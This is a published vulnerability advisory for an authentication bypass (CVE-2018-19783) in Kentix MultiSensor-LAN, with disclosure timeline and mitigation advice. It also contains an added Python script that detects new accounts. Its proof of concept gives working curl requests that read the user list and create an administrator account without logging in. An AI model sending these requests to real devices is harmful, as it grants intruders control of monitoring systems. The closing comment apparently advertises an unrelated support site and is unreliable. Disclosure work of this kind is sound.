
Kentix MultiSensor-LAN 5.63.00 Authentication Bypass

Posted Jan 18, 2019
Authored by Micha Borrmann

Kentix MultiSensor-LAN versions 5.63.00 and below suffer from an authentication bypass vulnerability. The web-based application does not use a conventional session mechanism with a session cookie to manage authenticated user sessions. Some URLs are protected with HTTP Basic Authentication, but the user management web page can be accessed and used without any authentication.

tags | exploit, web, bypass
advisories | CVE-2018-19783
MD5 | 85615421d4b8774b861196ab8f62be4f


Advisory ID: SYSS-2018-043
Product: MultiSensor-LAN
Manufacturer: Kentix GmbH
Affected Version(s): <= 5.63.00
Tested Version(s): 5.60.01, 5.63.00
Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel (CWE-288)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2018-12-03
Solution Date: -
Public Disclosure: 2019-01-17
CVE Reference: CVE-2018-19783
Authors of Advisory: Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Kentix MultiSensor LAN is a web-based management solution for monitoring
server rooms (see [1]).

The web site authentication can be bypassed to add another administrator
account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The web-based application does not use a conventional session mechanism
with a session cookie to manage authenticated user sessions. Some URLs
are protected with HTTP Basic Authentication, but the user management
web page can be accessed and used without any authentication.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The current user list can be read out without any authentication (all
values are Base64-encoded) using the following HTTP request:

$ curl --data 'action=0&A05000=1' --url http://$TARGETIP/io
{
"A05001":"YWRtaW4=",
"A05002":"KioqKioq",
"A05003":"",
"A05021":"MASKED",
"A05022":"KioqKioq",
"A05023":"MASKED",
"A05041":"MASKED",
"A05042":"KioqKioq",
"A05043":"MASKED",
"A05061":"",
"A05062":"",
"A05063":"",
"A05081":"",
"A05082":"",
"A05083":""
}

There are five possible accounts, which are represented with the
fields A0500[1-3], A0502[1-3], and so on. The first field is the user
name, the second is the masked password, and the last one is the
optional e-mail address.

With the following simple HTTP request another user account is
created (username and password are sent Base64-encoded, too):

$ curl --data 'action=1&A05061=MWJj&A05062=MWJj&save=3' --url http://$TARGETIP/io
{
"A05061":"MWJj",
"A05062":"KioqKioq"
}

With this created account, the web interface can be used very easily.
It can be verified that the user account was added successfully via
the previously shown HTTP request:

$ curl --data 'action=0&A05000=1' --url http://$TARGETIP/io
{
"A05001":"YWRtaW4=",
"A05002":"KioqKioq",
"A05003":"",
"A05021":"MASKED",
"A05022":"KioqKioq",
"A05023":"MASKED",
"A05041":"MASKED",
"A05042":"KioqKioq",
"A05043":"MASKED",
"A05061":"MWJj",
"A05062":"KioqKioq",
"A05063":"",
"A05081":"",
"A05082":"",
"A05083":""
}
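
For administrators who have to keep affected devices in service, the following added example (not part of the SySS advisory) decodes the user-list response according to the slot layout described above and reports account slots that differ from a known-good baseline. The function names are hypothetical, the two responses are the ones shown in the PoC, and it is assumed that the baseline was captured by the device owner.

```python
import base64

REDACTED = "MASKED"  # placeholder the advisory author put over real values
# User-list response from the advisory's PoC, before the extra account existed.
BEFORE = {
    "A05001": "YWRtaW4=", "A05002": "KioqKioq", "A05003": "",
    "A05021": "MASKED", "A05022": "KioqKioq", "A05023": "MASKED",
    "A05041": "MASKED", "A05042": "KioqKioq", "A05043": "MASKED",
    "A05061": "", "A05062": "", "A05063": "",
    "A05081": "", "A05082": "", "A05083": "",
}
# The same response after the PoC's account-creation request.
AFTER = dict(BEFORE, A05061="MWJj", A05062="KioqKioq")

def decode(value):
    """Base64-decode one field; empty means unset, REDACTED is passed through."""
    if value in ("", REDACTED):
        return value or None
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return "<undecodable:%s>" % value

def accounts(response):
    """Map slot number (1-5) to its decoded fields, skipping empty slots."""
    found = {}
    for slot in range(5):
        first = 1 + 20 * slot  # A05001, A05021, A05041, A05061, A05081
        user, password, email = (
            decode(response.get("A05%03d" % (first + k), "")) for k in range(3))
        if user is not None:
            found[slot + 1] = {"user": user, "password": password, "email": email}
    return found

def account_changes(baseline, current):
    """List (slot, kind, old_user, new_user) for each slot whose user name differs."""
    old, new = accounts(baseline), accounts(current)
    changes = []
    for slot in sorted(set(old) | set(new)):
        before = old.get(slot, {}).get("user")
        after = new.get(slot, {}).get("user")
        if before != after:
            kind = "added" if before is None else "removed" if after is None else "renamed"
            changes.append((slot, kind, before, after))
    return changes

if __name__ == "__main__":
    for change in account_changes(BEFORE, AFTER):
        print("slot %d: %s %r -> %r" % change)
```

Because the device always returns the password field masked, this comparison cannot show a password change on an existing account; it only covers user names appearing, disappearing or changing.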

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

As there was no response from the vendor, SySS GmbH is not aware of a
solution for this security issue.

Kentix MultiSensor LAN devices should be operated only in firewall
protected LANs with enabled network access control to reduce the risk
of unauthorized manipulations.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-11-30: Detection of the vulnerability
2018-12-01: CVE number assigned
2018-12-03: Vulnerability reported to manufacturer
2019-01-17: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Support web site
https://kentix.com/en/download-support/software-manuals-for-devices-until-01-2018/
[2] SySS Security Advisory SYSS-2018-043
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-043.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory
may be updated in order to provide as accurate information as
possible. The latest version of this security advisory is available on
the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en


Comments (1)

joeroot321

I have also used Kentix MultiSensor-LAN version 5.63.00, but I think it was a somewhat difficult process to handle, which is why I decided to go to www.routersupports.co/netgear-extender-su… for help; they told me how to solve the problem.

Comment by joeroot321
2019-01-22 04:43:57 UTC | Permalink | Reply